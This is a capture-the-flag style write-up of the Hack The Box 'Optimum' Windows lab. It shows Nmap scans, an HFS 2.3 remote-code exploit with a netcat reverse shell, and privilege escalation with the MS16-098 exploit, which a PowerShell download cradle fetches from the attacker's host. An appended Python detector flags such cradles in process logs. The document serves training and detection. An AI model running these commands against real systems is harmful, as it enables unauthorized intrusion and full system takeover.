Hack The Box Optimum Writeup
Hack The Box (HTB) is an online training platform for improving penetration testing skills. Optimum is a retired Windows box with the IP address 10.10.10.8.
Box Details
OS | Windows
Difficulty | Easy
Release | 18 March 2017
IP | 10.10.10.8
Start with Nmap
Run Nmap with the default scripts (-sC) and version detection (-sV):
#nmap -sC -sV 10.10.10.8 | tee nmap-initial.txt
To check all TCP ports:
#nmap -p- 10.10.10.8 | tee nmap-all-ports.txt
Run a UDP scan:
#nmap -sU 10.10.10.8
As port 80 is open, open the IP address in a web browser. The site is running HTTP File Server (HFS) 2.3.
Searching Google for an exploit for HTTP File Server 2.3 turns up CVE-2014-6287.
Read the instructions in the exploit to see how the payload is executed.
Locate nc.exe on Kali and copy it into the current directory:
#locate nc.exe
Edit the payload with your local IP address and port, then save it. Use ifconfig to identify the IP address of your machine.
ip_addr = "10.10.14.16"
local_port = "1111"
Execute the exploit: start a listener, serve nc.exe over HTTP, then run the exploit against the target.
#nc -lvnp 1111
#python -m SimpleHTTPServer 80
#python exploit.py 10.10.10.8 80
A shell comes back. Check the user token to see which account the shell is running as.
Privilege Escalation
Use systeminfo to gather details about the OS and installed patches:
>systeminfo
Copy this output into a text file (I have copied it in config-info.txt). Identify missing patches by running the Windows Exploit Suggester code from its GitHub repository against that file, using the command below:
#python windows-exploit-suggester.py --database 2020-12-02-mssb.xls --systeminfo config-info.txt
Many exploits are available for privilege escalation. I have used "Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)". You can download 41020.exe from the GitHub repository:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
Transfer the exe to the target machine and execute it with the commands below to get SYSTEM:
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.9/41020.exe','C:\Users\kostas\Desktop\41020.exe')"
41020.exe
Check with the command "whoami". If the output is as below, you have SYSTEM:
nt authority\system
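From the defender's side, the PowerShell WebClient download cradle and the executable launched from a user's Desktop above are the kind of process-creation events a SIEM rule should catch. The following detector is an added example, not part of the original write-up; the log format (user,image,commandline per line) and the sample lines are constructed to mirror the commands in this post.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation log lines (format assumed: user,image,commandline).
# The second and fourth lines mirror the download cradle and the dropped exe from the write-up.
SAMPLE_LOGS = [
    "kostas,C:\\Windows\\System32\\cmd.exe,cmd.exe /c systeminfo",
    "kostas,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,"
    "powershell -c \"(New-Object System.Net.WebClient).DownloadFile("
    "'http://10.10.14.9/41020.exe','C:\\Users\\kostas\\Desktop\\41020.exe')\"",
    "kostas,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,"
    "powershell -c \"Get-ChildItem C:\\Users\\kostas\\Desktop\"",
    "kostas,C:\\Users\\kostas\\Desktop\\41020.exe,41020.exe",
]

# Download-cradle verbs commonly seen in PowerShell command lines.
CRADLE_RE = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer)",
    re.IGNORECASE,
)
# Pull the remote URL and local destination out of DownloadFile('url','path').
DOWNLOADFILE_RE = re.compile(
    r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.IGNORECASE
)
# Executables started from user-writable directories deserve a look as well.
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData\\Local\\Temp)\\", re.IGNORECASE
)


def analyze_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding dict for one log line, or None when nothing matches."""
    user, image, cmdline = line.split(",", 2)
    if CRADLE_RE.search(cmdline):
        finding = {"user": user, "rule": "powershell_download_cradle", "cmdline": cmdline}
        m = DOWNLOADFILE_RE.search(cmdline)
        if m:  # enrich the alert with where the file came from and where it landed
            finding["url"], finding["dest"] = m.group(1), m.group(2)
        return finding
    if image.lower().endswith(".exe") and USER_WRITABLE_RE.search(image):
        return {"user": user, "rule": "exe_from_user_writable_dir", "image": image}
    return None


def analyze(lines: List[str]) -> List[Dict[str, str]]:
    """Run the detector over every log line and keep only the findings."""
    return [f for f in map(analyze_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOGS):
        print(finding)
```

Real Sysmon Event ID 1 or Windows 4688 records carry the same three fields, so the patterns transfer directly once the line parsing is swapped for your log source.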
Conclusion
This article is a quick write-up of the HTB Optimum Windows box. If you run into issues at any step, let me know in the comment section.
Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.